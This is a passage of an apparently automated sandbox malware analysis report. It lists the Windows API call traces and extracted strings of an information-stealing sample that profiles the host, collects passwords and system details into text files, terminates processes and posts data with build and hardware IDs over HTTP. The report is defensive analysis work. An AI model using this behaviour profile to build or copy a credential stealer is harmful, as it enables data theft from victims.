                                                                                                                                                                                                                                                                    • Part of subcall function 0041045D: RegQueryValueExA.KERNEL32(>eB,MachineGuid,00000000,00000000,?,000000FF,?,?,00000000), ref: 004104BE
                                                                                                                                                                                                                                                                    • Part of subcall function 0041045D: CharToOemA.USER32(?,?), ref: 004104DB
                                                                                                                                                                                                                                                                    • Part of subcall function 004104EA: GetCurrentHwProfileA.ADVAPI32(?), ref: 004104FB
                                                                                                                                                                                                                                                                    • Part of subcall function 00410525: _EH_prolog.MSVCRT ref: 0041052A
                                                                                                                                                                                                                                                                    • Part of subcall function 00410525: GetWindowsDirectoryA.KERNEL32(?,00000104,00000001,?,00000000), ref: 0041054D
                                                                                                                                                                                                                                                                    • Part of subcall function 00410525: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 0041057F
                                                                                                                                                                                                                                                                    • Part of subcall function 00410525: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 004105C2
                                                                                                                                                                                                                                                                    • Part of subcall function 00410525: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 004105C9
                                                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(00000000,?,Path: ,00000000,?,004265F0,00000000,?,00000000,00000000,?,HWID: ,00000000,?,004265E4,00000000), ref: 00414A1A
                                                                                                                                                                                                                                                                    • Part of subcall function 00410FE7: OpenProcess.KERNEL32(00000410,00000000,*JA), ref: 00410FFF
                                                                                                                                                                                                                                                                    • Part of subcall function 00410FE7: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 0041101A
                                                                                                                                                                                                                                                                    • Part of subcall function 00410FE7: CloseHandle.KERNEL32(00000000), ref: 00411021
                                                                                                                                                                                                                                                                    • Part of subcall function 00410693: GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,?,00414B0F,00000000,?,Windows: ,00000000,?,00426614,00000000,?,Work Dir: In memory), ref: 004106A7
                                                                                                                                                                                                                                                                    • Part of subcall function 00410693: HeapAlloc.KERNEL32(00000000,?,?,?,00414B0F,00000000,?,Windows: ,00000000,?,00426614,00000000,?,Work Dir: In memory,00000000,?), ref: 004106AE
                                                                                                                                                                                                                                                                    • Part of subcall function 004107A6: _EH_prolog.MSVCRT ref: 004107AB
                                                                                                                                                                                                                                                                    • Part of subcall function 004107A6: CoInitializeEx.OLE32(00000000,00000000,?,?,?,?,?,?,00426614,00000000,?,Work Dir: In memory,00000000,?,004265FC,00000000), ref: 004107BB
                                                                                                                                                                                                                                                                    • Part of subcall function 004107A6: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,?,00426614), ref: 004107CC
                                                                                                                                                                                                                                                                    • Part of subcall function 004107A6: CoCreateInstance.OLE32(004282F0,00000000,00000001,00428220,?,?,?,?,?,?,?,00426614,00000000,?,Work Dir: In memory,00000000), ref: 004107E6
                                                                                                                                                                                                                                                                    • Part of subcall function 004107A6: CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,?,?,?,?,?,00426614,00000000), ref: 0041081C
                                                                                                                                                                                                                                                                    • Part of subcall function 004107A6: VariantInit.OLEAUT32(?), ref: 00410877
                                                                                                                                                                                                                                                                    • Part of subcall function 0041092F: _EH_prolog.MSVCRT ref: 00410934
                                                                                                                                                                                                                                                                    • Part of subcall function 0041092F: CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,Work Dir: In memory,00000000,?,004265FC,00000000,?,00000000), ref: 00410944
                                                                                                                                                                                                                                                                    • Part of subcall function 0041092F: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,Work Dir: In memory,00000000,?,004265FC), ref: 00410955
                                                                                                                                                                                                                                                                    • Part of subcall function 0041092F: CoCreateInstance.OLE32(004282F0,00000000,00000001,00428220,?,?,00000000,?,Work Dir: In memory,00000000,?,004265FC,00000000,?,00000000), ref: 0041096F
                                                                                                                                                                                                                                                                    • Part of subcall function 0041092F: CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,Work Dir: In memory,00000000,?,004265FC,00000000), ref: 004109A5
                                                                                                                                                                                                                                                                    • Part of subcall function 0041092F: VariantInit.OLEAUT32(?), ref: 004109F4
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FC44: GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,00414CB6,00000000,?,Computer Name: ,00000000,?,00426644,00000000,?,00000000,00000000), ref: 0040FC50
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FC44: HeapAlloc.KERNEL32(00000000,?,?,00414CB6,00000000,?,Computer Name: ,00000000,?,00426644,00000000,?,00000000,00000000,?,AV: ), ref: 0040FC57
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FC44: GetComputerNameA.KERNEL32(00000000,00000000), ref: 0040FC6B
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FC12: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0041736F,004265B7), ref: 0040FC1E
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FC12: HeapAlloc.KERNEL32(00000000,?,?,?,0041736F,004265B7), ref: 0040FC25
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FC12: GetUserNameA.ADVAPI32(00000000,?), ref: 0040FC39
                                                                                                                                                                                                                                                                    • Part of subcall function 004103E8: CreateDCA.GDI32(00000000,00000000,00000000,00000001), ref: 004103FD
                                                                                                                                                                                                                                                                    • Part of subcall function 004103E8: GetDeviceCaps.GDI32(00000000,00000008), ref: 00410408
                                                                                                                                                                                                                                                                    • Part of subcall function 004103E8: GetDeviceCaps.GDI32(00000000,0000000A), ref: 00410413
                                                                                                                                                                                                                                                                    • Part of subcall function 004103E8: ReleaseDC.USER32(00000000,00000000), ref: 0041041E
                                                                                                                                                                                                                                                                    • Part of subcall function 004103E8: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,?,00414DB8,?,00000000,?,Display Resolution: ,00000000,?,00426668,00000000,?), ref: 0041042A
                                                                                                                                                                                                                                                                    • Part of subcall function 004103E8: HeapAlloc.KERNEL32(00000000,?,00000000,?,?,00414DB8,?,00000000,?,Display Resolution: ,00000000,?,00426668,00000000,?,00000000), ref: 00410431
                                                                                                                                                                                                                                                                    • Part of subcall function 004103E8: wsprintfA.USER32 ref: 00410443
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FD2C: _EH_prolog.MSVCRT ref: 0040FD31
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FD2C: GetKeyboardLayoutList.USER32(00000000,00000000,004262AF,00000001,?,00000000), ref: 0040FD63
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FD2C: LocalAlloc.KERNEL32(00000040,00000000,?,00000000), ref: 0040FD71
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FD2C: GetKeyboardLayoutList.USER32(00000000,00000000,?,00000000), ref: 0040FD7C
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FD2C: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,?,00000000), ref: 0040FDA6
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FD2C: LocalFree.KERNEL32(?), ref: 0040FE4A
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FCD9: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,Computer Name: ,00000000,?,00426644,00000000,?,00000000,00000000,?,AV: ), ref: 0040FCEA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FCD9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,00426644,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040FCF1
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FCD9: GetTimeZoneInformation.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,00426644,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040FD00
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FCD9: wsprintfA.USER32 ref: 0040FD1E
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE5F: GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,?,00415034,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,004266C4), ref: 0040FE73
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE5F: HeapAlloc.KERNEL32(00000000,?,?,?,00415034,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,004266C4,00000000,?), ref: 0040FE7A
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE5F: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,00415034,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?), ref: 0040FE98
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE5F: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,?,?,00415034,00000000,?,Processor: ,00000000,?,[Hardware],00000000), ref: 0040FEB4
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FEFB: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 0040FF4E
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FEFB: wsprintfA.USER32 ref: 0040FF94
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FEC8: GetSystemInfo.KERNEL32(00000000), ref: 0040FED5
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FEC8: wsprintfA.USER32 ref: 0040FEEA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFC9: GetProcessHeap.KERNEL32(00000000,00000104,00000001,00000000,00000000,?,Windows: ,00000000,?,00426614,00000000,?,Work Dir: In memory,00000000,?,004265FC), ref: 0040FFD7
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFC9: HeapAlloc.KERNEL32(00000000), ref: 0040FFDE
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFC9: GlobalMemoryStatusEx.KERNEL32 ref: 0040FFFE
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFC9: wsprintfA.USER32 ref: 00410024
                                                                                                                                                                                                                                                                    • Part of subcall function 00410032: _EH_prolog.MSVCRT ref: 00410037
                                                                                                                                                                                                                                                                    • Part of subcall function 00410032: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 0041009F
                                                                                                                                                                                                                                                                    • Part of subcall function 0041030B: _EH_prolog.MSVCRT ref: 00410310
                                                                                                                                                                                                                                                                    • Part of subcall function 0041030B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041034B
                                                                                                                                                                                                                                                                    • Part of subcall function 0041030B: Process32First.KERNEL32(00000000,00000128), ref: 0041035C
                                                                                                                                                                                                                                                                    • Part of subcall function 0041030B: Process32Next.KERNEL32(?,00000128), ref: 004103C4
                                                                                                                                                                                                                                                                    • Part of subcall function 0041030B: CloseHandle.KERNEL32(?,?,00000000), ref: 004103D1
                                                                                                                                                                                                                                                                    • Part of subcall function 004100B9: _EH_prolog.MSVCRT ref: 004100BE
                                                                                                                                                                                                                                                                    • Part of subcall function 004100B9: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,004262C7,00000001,00000000), ref: 00410106
                                                                                                                                                                                                                                                                    • Part of subcall function 004100B9: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00410150
                                                                                                                                                                                                                                                                    • Part of subcall function 004100B9: wsprintfA.USER32 ref: 0041017A
                                                                                                                                                                                                                                                                    • Part of subcall function 004100B9: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 00410197
                                                                                                                                                                                                                                                                    • Part of subcall function 004100B9: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 004101C1
                                                                                                                                                                                                                                                                    • Part of subcall function 004100B9: lstrlenA.KERNEL32(?), ref: 004101D6
                                                                                                                                                                                                                                                                    • Part of subcall function 004100B9: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,00000000,?,?,00000000,?,004262F0), ref: 00410256
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,?,00426738,00000000,?,00000000,00000000,?,00000000,00000000,?,[Software],00000000,?,00426728), ref: 00415478
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: _EH_prolog.MSVCRT ref: 0041451E
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: CreateThread.KERNEL32(00000000,00000000,0041331B,?,00000000,00000000), ref: 004145C4
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004145CC
                                                                                                                                                                                                                                                                    • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Heap$H_prolog$Process$Alloc$wsprintf$CreateOpen$InitializeQueryValuelstrcpy$InformationLocalNamelstrlen$BlanketCapsCloseCurrentDeviceEnumHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariantlstrcat$CharComputerDevicesDirectoryDisplayFileFirstFreeGlobalLocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZonememset
                                                                                                                                                                                                                                                                  • String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $U$User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                                                                                                                                                                                                                                                  • API String ID: 722754166-3657450861
                                                                                                                                                                                                                                                                  • Opcode ID: a37c958319b456512c2c18d4d406cbd480eb3c9c5089317152751ee4f4775006
                                                                                                                                                                                                                                                                  • Instruction ID: 084949f72d481bf670e70f269b8f8bc486b787bf6dde41fe46f753e6acbf2686
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a37c958319b456512c2c18d4d406cbd480eb3c9c5089317152751ee4f4775006
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AD921871900249EACB15E7E5C956BEEBBB85F25308F2401BFA106735C2DE781B4CCBA5

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 0040C2D4
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 00410B42: _EH_prolog.MSVCRT ref: 00410B47
                                                                                                                                                                                                                                                                    • Part of subcall function 00410B42: GetSystemTime.KERNEL32(?,00426488,00000001,000000C8,00000000,004265AA), ref: 00410B87
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,00425BA4,?,?,?,00425B9E,?,00000000), ref: 0040C3CC
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040C42D
                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0040C434
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000), ref: 0040C4C4
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000), ref: 0040C4DB
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0040C4ED
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00425BA8), ref: 0040C4FB
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0040C50D
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00425BAC), ref: 0040C51B
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000), ref: 0040C52A
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0040C53C
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00425BB0), ref: 0040C54A
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000), ref: 0040C559
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0040C56B
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00425BB4), ref: 0040C579
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000), ref: 0040C588
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0040C59A
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00425BB8), ref: 0040C5A8
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00425BBC), ref: 0040C5B6
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040C5EA
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040C63D
                                                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 0040C66A
                                                                                                                                                                                                                                                                    • Part of subcall function 00406404: _EH_prolog.MSVCRT ref: 00406409
                                                                                                                                                                                                                                                                    • Part of subcall function 00406404: memcmp.MSVCRT ref: 0040642F
                                                                                                                                                                                                                                                                    • Part of subcall function 00406404: memset.MSVCRT ref: 0040645E
                                                                                                                                                                                                                                                                    • Part of subcall function 00406404: LocalAlloc.KERNEL32(00000040,-000000E1,?,?,?,?,00000000,00000000), ref: 00406493
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: lstrcat$H_prolog$lstrcpy$lstrlen$FileHeapmemset$AllocAllocateCopyDeleteLocalProcessSystemTimememcmp
                                                                                                                                                                                                                                                                  • String ID: passwords.txt

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00413906
                                                                                                                                                                                                                                                                    • Part of subcall function 004135A1: _EH_prolog.MSVCRT ref: 004135A6
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9DE: lstrlenA.KERNEL32(?,00000000,?,00416ABD,004265A7,004265A6,00000000,00000000,?,0041740F), ref: 0040F9E7
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9DE: lstrcpy.KERNEL32(00000000,00000000), ref: 0040FA1B
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413AE7
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413B7D
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 00413020: _EH_prolog.MSVCRT ref: 00413025
                                                                                                                                                                                                                                                                    • Part of subcall function 00413020: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413083
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413CBE
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413D54
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413E95
                                                                                                                                                                                                                                                                    • Part of subcall function 0041310D: _EH_prolog.MSVCRT ref: 00413112
                                                                                                                                                                                                                                                                    • Part of subcall function 0041310D: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413194
                                                                                                                                                                                                                                                                    • Part of subcall function 0041310D: lstrlenA.KERNEL32(00000000), ref: 004131AB
                                                                                                                                                                                                                                                                    • Part of subcall function 0041310D: StrStrA.SHLWAPI(00000000,00000000), ref: 004131D2
                                                                                                                                                                                                                                                                    • Part of subcall function 0041310D: lstrlenA.KERNEL32(00000000), ref: 004131E7
                                                                                                                                                                                                                                                                    • Part of subcall function 0041310D: lstrlenA.KERNEL32(00000000), ref: 00413202
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413F2B
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041406C
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414102
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414243
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004142D3
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(0000EA60), ref: 004142E2
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prolog$lstrcpylstrlen$Sleep
                                                                                                                                                                                                                                                                  • String ID: "$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00403B23
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: _EH_prolog.MSVCRT ref: 00403A82
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: ??_U@YAPAXI@Z.MSVCRT ref: 00403AB4
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: ??_U@YAPAXI@Z.MSVCRT ref: 00403ABD
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: ??_U@YAPAXI@Z.MSVCRT ref: 00403AC6
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AE0
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AF0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00403BCE
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 00403BE5
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                  • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00403D6D
                                                                                                                                                                                                                                                                  • HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 00403DA7
                                                                                                                                                                                                                                                                  • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00403DCB
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,004259CD,00000000,?,?,00000000,?,",00000000,?,build_id), ref: 004040A7
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 004040C0
                                                                                                                                                                                                                                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004040D1
                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404125
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00404130
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 00404145
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 0040414E
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Internet$lstrcpy$H_prologlstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
                                                                                                                                                                                                                                                                  • String ID: !$"$"$------$------$------$build_id$hwid

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 0040678F
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FB6F: StrCmpCA.SHLWAPI(?,?,?,00408ADB,00425DD4,00000000), ref: 0040FB78
                                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,00425BD0,?,?,?,00425BA6,?,00000000), ref: 004068FB
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 0041103C: _EH_prolog.MSVCRT ref: 00411041
                                                                                                                                                                                                                                                                    • Part of subcall function 0041103C: memset.MSVCRT ref: 00411063
                                                                                                                                                                                                                                                                    • Part of subcall function 0041103C: OpenProcess.KERNEL32(00001001,00000000,?,?,?,?,00000000,?), ref: 004110EA
                                                                                                                                                                                                                                                                    • Part of subcall function 0041103C: TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000000,?), ref: 004110F8
                                                                                                                                                                                                                                                                    • Part of subcall function 0041103C: CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 004110FF
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
